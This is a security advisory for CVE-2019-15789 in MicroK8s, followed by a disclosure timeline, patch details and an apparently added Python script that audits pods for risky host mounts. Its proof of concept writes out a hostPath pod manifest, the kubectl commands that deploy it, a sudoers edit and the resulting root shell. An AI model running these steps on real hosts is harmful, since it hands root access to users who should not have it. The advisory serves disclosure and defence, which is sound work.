Privilege escalation vulnerability in MicroK8s allows a low privilege user with local access to obtain root access to the host by provisioning a privileged container. Fixed in MicroK8s 1.15.3.


MICROK8S – PRIVILEGE ESCALATION (CVE-2019-15789)

Sep 10 2019

MicroK8s prior to v1.15.3 included a privilege escalation vulnerability, allowing a low privilege user to obtain root access to the host. MicroK8s allowed any user with access to the host to deploy a pod to the underlying Kubernetes installation. This allowed an attacker with local access to provision a privileged container and gain root access to the underlying host.

Date Released: 10/09/2019
Author: Denis Andzakovic
Project Website: https://microk8s.io/
Affected Software: MicroK8s <= v1.15.2
CVE: CVE-2019-15789

PROOF-OF-CONCEPT EXPLOIT

As low privileged users were allowed to configure the running cluster and containers therein, a malicious user could spawn a pod with complete access to the root file system, edit /etc/sudoers and escalate to root.

doi@microk8:~$ cat pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: hostmount
spec:
  containers:
  - name: shell
    image: ubuntu:latest
    command:
      - "bin/bash"
      - "-c"
      - "sleep 10000"
    volumeMounts:
      - name: root
        mountPath: /opt/root
  volumes:
  - name: root
    hostPath:
      path: /
      type: Directory
doi@microk8:~$ microk8s.kubectl apply -f pod.yaml
pod/hostmount created
doi@microk8:~$ microk8s.kubectl exec -it hostmount /bin/bash
root@hostmount:/# cd /opt/
root@hostmount:/opt# cd root/
root@hostmount:/opt/root# ls
bin   dev  home        initrd.img.old  lib64       media  opt   root  sbin  srv       sys  usr  vmlinuz
boot  etc  initrd.img  lib             lost+found  mnt    proc  run   snap  swap.img  tmp  var  vmlinuz.old
root@hostmount:/opt/root# cd etc/
root@hostmount:/opt/root/etc# sed -i 's/ALL$/NOPASSWD: ALL/g' sudoers
root@hostmount:/opt/root/etc# cat sudoers
{...snip...}
# User privilege specification
root    ALL=(ALL:ALL) NOPASSWD: ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) NOPASSWD: ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) NOPASSWD: ALL
{...snip...}
root@hostmount:/opt/root/etc# exit
exit
doi@microk8:~$ sudo su -
root@microk8:~# id
uid=0(root) gid=0(root) groups=0(root)

The above could also be trivially achieved with a privileged container, though MicroK8s disables privileged containers by default. Note: privileged containers are enabled when Istio is installed.
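The pod in the proof of concept sets no privileged flag; the hostPath volume on / is what exposes the host. As an added example (not part of the original advisory), the following Python audit flags such pods in the JSON produced by `microk8s.kubectl get pods --all-namespaces -o json`. The function names, the list of sensitive paths and the sample pods are constructed for illustration.

```python
import json

# Host subtrees treated as sensitive (assumed list for this example; extend as needed).
SENSITIVE = ("/etc", "/root", "/home", "/var/run", "/var/lib", "/proc", "/sys", "/dev")

def risky_host_path(path):
    """True if a hostPath exposes the host root or a sensitive subtree."""
    if not path:
        return False
    norm = "/" + path.strip("/")  # "/" stays "/", "/etc/" becomes "/etc"
    return norm == "/" or any(norm == p or norm.startswith(p + "/") for p in SENSITIVE)

def audit_pod(pod):
    """Return findings for one Pod object in Kubernetes API (JSON) shape."""
    spec = pod.get("spec") or {}
    name = (pod.get("metadata") or {}).get("name", "<unnamed>")
    findings = []
    for vol in spec.get("volumes") or []:
        host = vol.get("hostPath") or {}
        if risky_host_path(host.get("path")):
            findings.append(f"{name}: volume '{vol.get('name')}' mounts host path {host['path']}")
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            findings.append(f"{name}: {flag} is enabled")
    for c in (spec.get("containers") or []) + (spec.get("initContainers") or []):
        if (c.get("securityContext") or {}).get("privileged"):
            findings.append(f"{name}: container '{c.get('name')}' is privileged")
    return findings

def audit(doc):
    """Accept a single Pod or the List that 'kubectl get pods -o json' returns."""
    pods = (doc.get("items") or []) if "items" in doc else [doc]
    return [f for pod in pods for f in audit_pod(pod)]

# Constructed sample: the advisory's pod.yaml in JSON form, a benign pod, a privileged pod.
SAMPLE = json.loads("""
{"kind": "List", "items": [
 {"kind": "Pod", "metadata": {"name": "hostmount"}, "spec": {
   "containers": [{"name": "shell", "image": "ubuntu:latest"}],
   "volumes": [{"name": "root", "hostPath": {"path": "/", "type": "Directory"}}]}},
 {"kind": "Pod", "metadata": {"name": "web"}, "spec": {
   "containers": [{"name": "nginx", "securityContext": {"privileged": false}}],
   "volumes": [{"name": "cache", "emptyDir": {}}]}},
 {"kind": "Pod", "metadata": {"name": "mesh"}, "spec": {
   "containers": [{"name": "proxy", "securityContext": {"privileged": true}}]}}
]}
""")
if __name__ == "__main__":
    print("\n".join(audit(SAMPLE)))
```

Matching is done on whole path components, so a volume on /etc/ is flagged while one on /etcd-data is not.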

PATCH

The MicroK8s team addressed this vulnerability in v1.15.3 by requiring any access to the Kubernetes installation to be performed by a privileged user (e.g., through sudo or by adding the user to the microk8s group).

TIMELINE

12/06/2019 – Advisory sent to Ubuntu security mailing list.
14/06/2019 – Advisory receipt acknowledged.
16/07/2019 – Update requested.
17/07/2019 – Report confirmed by the Ubuntu team.
15/08/2019 – Update requested.
15/08/2019 – Ubuntu referenced an open pull request introducing a requirement for all MicroK8s actions to be performed via sudo.
06/09/2019 – v1.15.3 snap added to stable.
10/09/2019 – Advisory released.

CVE-2019-15789

Description
MicroK8s prior to v1.15.3 included a privilege escalation vulnerability,
allowing a low privilege user to obtain root access to the host. MicroK8s
allowed any user with access to the host to administer the underlying
Kubernetes installation, including deploying pods. This allowed an attacker
with local access to provision a privileged container and gain root access
to the underlying host.
References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15789
https://pulsesecurity.co.nz/advisories/microk8s-privilege-escalation
https://discuss.kubernetes.io/t/explicit-use-of-sudo-in-microk8s-cli/7605
